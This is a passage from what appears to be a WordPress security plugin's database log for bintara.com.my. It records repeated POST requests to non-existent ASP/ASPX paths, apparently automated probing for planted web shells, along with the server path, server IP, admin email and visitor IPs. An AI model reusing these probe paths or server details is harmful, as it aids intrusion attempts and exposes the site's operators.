Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.223.223.7\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.223.223.7\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/UploadFiles/1l.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/UploadFiles/1l.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tYeAgYuZ1@aLzbZgQHgAAAI8\";s:12:\"REDIRECT_URL\";s:19:\"/UploadFiles/1l.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/UploadFiles/1l.asp\";s:10:\"SCRIPT_URL\";s:19:\"/UploadFiles/1l.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tYeAgYuZ1@aLzbZgQHgAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695969.3837\";s:12:\"REQUEST_TIME\";s:10:\"1571695969\";}}','notice','2019-10-21 22:12:51','2019-10-21 22:12:49',35339480,37139296,'http://bintara.com.my//UploadFiles/1l.asp',1,0,'222.223.223.7'),(28664,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//UploadFiles/1l.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"119.40.234.137\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"119.40.234.137\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/UploadFiles/1l.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/UploadFiles/1l.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tZuAgYuZ1@aLzbZgQIQAAAIg\";s:12:\"REDIRECT_URL\";s:19:\"/UploadFiles/1l.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/UploadFiles/1l.asp\";s:10:\"SCRIPT_URL\";s:19:\"/UploadFiles/1l.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tZuAgYuZ1@aLzbZgQIQAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695975.0478\";s:12:\"REQUEST_TIME\";s:10:\"1571695975\";}}','notice','2019-10-21 22:12:57','2019-10-21 22:12:55',35265880,37064192,'http://bintara.com.my//UploadFiles/1l.asp',1,0,'119.40.234.137'),(28665,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//Css/w3wp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"822\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"121.40.86.3\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"121.40.86.3\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/Css/w3wp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/Css/w3wp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tbOAgYuZ1@aLzbZgQIwAAAJU\";s:12:\"REDIRECT_URL\";s:13:\"/Css/w3wp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/Css/w3wp.asp\";s:10:\"SCRIPT_URL\";s:13:\"/Css/w3wp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tbOAgYuZ1@aLzbZgQIwAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695981.0933\";s:12:\"REQUEST_TIME\";s:10:\"1571695981\";}}','notice','2019-10-21 22:13:03','2019-10-21 22:13:01',35342616,37139592,'http://bintara.com.my//Css/w3wp.asp',1,0,'121.40.86.3'),(28666,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//Css/w3wp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"210.45.191.4\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"210.45.191.4\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/Css/w3wp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/Css/w3wp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4teSEiZGLZYlop40cFUQAAARI\";s:12:\"REDIRECT_URL\";s:13:\"/Css/w3wp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"62719\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/Css/w3wp.asp\";s:10:\"SCRIPT_URL\";s:13:\"/Css/w3wp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4teSEiZGLZYlop40cFUQAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695993.1211\";s:12:\"REQUEST_TIME\";s:10:\"1571695993\";}}','notice','2019-10-21 22:13:14','2019-10-21 22:13:13',35266528,37062048,'http://bintara.com.my//Css/w3wp.asp',1,0,'210.45.191.4'),(28667,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//5t/images/diy.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.137.164.44\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.137.164.44\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/5t/images/diy.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/5t/images/diy.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tmRAAxqfYqgF3mYfVWwAAAFg\";s:12:\"REDIRECT_URL\";s:18:\"/5t/images/diy.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63097\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/5t/images/diy.asp\";s:10:\"SCRIPT_URL\";s:18:\"/5t/images/diy.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tmRAAxqfYqgF3mYfVWwAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571696025.384\";s:12:\"REQUEST_TIME\";s:10:\"1571696025\";}}','notice','2019-10-21 22:13:47','2019-10-21 22:13:45',35343880,37152816,'http://bintara.com.my//5t/images/diy.asp',1,0,'211.137.164.44'),(28668,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//5t/images/diy.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"219.235.9.7\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"219.235.9.7\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/5t/images/diy.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/5t/images/diy.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tnRAAxqfYqgF3mYfVXAAAAEg\";s:12:\"REDIRECT_URL\";s:18:\"/5t/images/diy.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63097\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/5t/images/diy.asp\";s:10:\"SCRIPT_URL\";s:18:\"/5t/images/diy.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tnRAAxqfYqgF3mYfVXAAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696030.0411\";s:12:\"REQUEST_TIME\";s:10:\"1571696030\";}}','notice','2019-10-21 22:13:51','2019-10-21 22:13:50',35267944,37074136,'http://bintara.com.my//5t/images/diy.asp',1,0,'219.235.9.7'),(28669,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//IAboutUs/MK/v.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"58.207.24.24\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"58.207.24.24\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/IAboutUs/MK/v.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/IAboutUs/MK/v.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tpBAAxqfYqgF3mYfVXgAAAEE\";s:12:\"REDIRECT_URL\";s:19:\"/IAboutUs/MK/v.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"63097\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/IAboutUs/MK/v.aspx\";s:10:\"SCRIPT_URL\";s:19:\"/IAboutUs/MK/v.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tpBAAxqfYqgF3mYfVXgAAAEE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696036.2437\";s:12:\"REQUEST_TIME\";s:10:\"1571696036\";}}','notice','2019-10-21 22:13:58','2019-10-21 22:13:56',35338152,37147536,'http://bintara.com.my//IAboutUs/MK/v.aspx',1,0,'58.207.24.24'),(28670,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//IAboutUs/MK/v.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.162.98.110\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.162.98.110\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/IAboutUs/MK/v.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/IAboutUs/MK/v.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4trSEiZGLZYlop40cFZgAAAQE\";s:12:\"REDIRECT_URL\";s:19:\"/IAboutUs/MK/v.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/IAboutUs/MK/v.aspx\";s:10:\"SCRIPT_URL\";s:19:\"/IAboutUs/MK/v.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4trSEiZGLZYlop40cFZgAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696045.4748\";s:12:\"REQUEST_TIME\";s:10:\"1571696045\";}}','notice','2019-10-21 22:14:07','2019-10-21 22:14:05',35267264,37068960,'http://bintara.com.my//IAboutUs/MK/v.aspx',1,0,'124.162.98.110'),(28671,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//data/guowai.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.205.170.167\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.205.170.167\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/data/guowai.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/data/guowai.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tsiEiZGLZYlop40cFagAAARE\";s:12:\"REDIRECT_URL\";s:16:\"/data/guowai.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/data/guowai.asp\";s:10:\"SCRIPT_URL\";s:16:\"/data/guowai.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tsiEiZGLZYlop40cFagAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571696050.9988\";s:12:\"REQUEST_TIME\";s:10:\"1571696050\";}}','notice','2019-10-21 22:14:12','2019-10-21 22:14:11',35341488,37138680,'http://bintara.com.my//data/guowai.asp',1,0,'220.205.170.167'),(28672,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//data/guowai.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 